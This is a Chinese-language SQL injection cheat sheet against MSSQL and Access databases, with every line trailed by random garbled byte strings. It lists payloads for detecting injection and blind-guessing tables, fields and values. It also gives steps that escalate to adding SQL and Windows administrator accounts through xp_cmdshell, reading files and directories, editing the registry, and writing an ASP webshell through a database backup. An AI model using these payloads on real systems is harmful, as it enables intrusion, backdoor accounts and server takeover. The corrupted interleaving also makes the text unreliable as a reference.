1.判断是否有注入;and 1=1 ;and 1=2 G| ^�t��qI
2.初步判断是否是mssql ;and user>0 n0n��k�v�[
9NKZE?5P|D
3.注入参数是字符'and [查询条件] and ''=' H�H8a"�Hq)
/�TS>I8�V!
4.搜索时没过滤参数的'and [查询条件] and '%25'=' b��M�f�+/n
2�L�� ~U�^
5.判断数据库系统 lYU_uFO�s\
lA�V6z%MmM
;and (select count(*) from sysobjects)>0 mssql dc"Vc �3�)
HA"LU;5>2J
;and (select count(*) from msysobjects)>0 access DH�@*O��z-
�L<J%IlcfO
Z�5_MSP�m
}Li�24��JK
6.猜数据库 ;and (select Count(*) from [数据库名])>0 B�B=%tz`�B
cYW F)WAog
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �Ci=c"J�dB
��{U��7j��
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 si0jXue~j\
� XW`&1qx�
9.(1)猜字段的ascii值(access) X�=_N7��!�
;\(�wJ{u?Y
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 \Ui8S�geei
�`<q�{��8
(2)猜字段的ascii值(mssql) fytg�S(?I'
(~,�Q-�w"�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 D6c4t�A^EO
�7�RTp+FC]
10.测试权限结构(mssql) dAo�hj
QH:
�(�8k�3z�`
�>�lN{�FJ�
GXJJOy1�"!
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ln#Lx&�r;|
zLC\R�c4�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- )=ZWn,�Z�B
w�I�L�5-k,
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ^B�S�MlKyB
b[VP�"KZ�?
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �.,�UpI|�b
�L)4TW6IUk
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- B4_0+K ��H
X�|@|�ZRN�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- &P�gb��Fy
��tJ[Hcx*N
;and 1=(select IS_MEMBER('db_owner'));-- |_
E)2b:h
!&ac}u�D^g
.u)Po;e`��
�E.4`aJ@>d
11.添加mssql和系统的帐户 Q_qc_IcM y
?,TON�5Fl-
;exec master.dbo.sp_addlogin username;-- OV Iu�&6#
;exec master.dbo.sp_password null,username,password;-- GYyP+7K4l[
�8xZN4ck_@
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- lRX*\�M�\`
&-s!k�o4z
;exec master.dbo.xp_cmdshell 'net user username password �f�
\[Z�`D
qP�*$�wKY,
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- :1s6h%evrT
#*1\h=bzmW
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ?UQE�;0 B�
~�g~z"!K�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �}vPD��CUZ
d*�7 Tjs{\
�C���/tn�0
�-D`*$rp�,
12.(1)遍历目录 \<]nv}1��O
hA/�K>Z���
;create table dirs(paths varchar(100), id int) sGc4^Z%l�?
n\Z��DI+X�
;insert dirs exec master.dbo.xp_dirtree 'c:\' �0ppZ~�}&�
#�p6#,�PZ�
;and (select top 1 paths from dirs)>0 1j9��.Q�;9
�a�&M��{�y
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Oy&Myj�ny<
X�+
h|s��y
�#�=q)>+\�
"��#qyX[�\
(2)遍历目录 9#@dQ�/�*
�Q�Y/36gK
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 4�JT9EKo��
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 k���hyn4
�
w<tr<P�u�'
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ��-{-w5_B$
`$��fwLC3j
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 /��F5g@ X&
�/`Y�p]l��
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 S�6��`4&0'
<.��_M�NHC
y8D�'V)B��
��+�i!�/J
13.mssql中的存储过程 :W? �7��J"
?6;� +.�h\
xp_regenumvalues 注册表根键, 子键 K��#}DX�q�
/�~K-0K�#w
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 0Zs�}y\J`�
&w- QMj�M>
xp_regread 根键,子键,键值名 u�F+if�`�?
)�?:V5UO\
;exec xp_regread dl6�d�!Nz*
��1ZO�Hy�O
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 |l
03,�dOF
�W52AX�.Nm
xp_regwrite 根键,子键, 值名, 值类型, 值 mh2t '� �O
?*tb|AL(R
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 w�<|��^i*�
��?A�3pXa�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �eZ�(<�hE>
�[2a��*TI�
xp_regdeletevalue 根键,子键,值名 Z��Yos.�ay
e@Q<hb0<eU
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �YrS%Yvhj0
�|�nk�&ir6
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 AL>*Vj2h/n
!�=V>Dg�mW
-y1%c^36_J
���$21+�6
14.mssql的backup创建webshell R�q%g5lK�
?PO~$dUc]
use model +FP��*RNM�
k^�}8=,j}
create table cmd(str image); XnHcU=�~q
�.nJErC##�
insert into cmd(str) values (''); �loZ��JV M
y<.0+YL-e+
backup database model to disk='c:\l.asp'; 4/e���-E�^
HW;,Xz�P=�
82WX�gB�>�
[k� �Z�vBd
15.mssql内置函数
6�'3@/�.�
w*V�f{[�a'
;and (select @@version)>0 获得Windows的版本号 uHkL���$}C
U�+�3,(O�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa G9TK)N��z
��2M�3.xUS
;and (select user_name())>0 爆当前系统的连接用户 �h��u%�UEB
n��4h@{Xg
;and (select db_name())>0 得到当前连接的数据库 �}xJ9EE*G/
Uvgv<�OR`_
x0�0"�d$�!
AkrUb�$ �}
16.简洁的webshell yQ?N*'�}$�
<.s=)�}'`P
use model s?�����@{
HF"
v�
\ �
create table cmd(str image); a;|C51G�H
*�Em �9R��
insert into cmd(str) values (''); [ Lt1O�dGl
.iN�PLz�1
backup database model to disk='g:\wwwtest\l.asp';
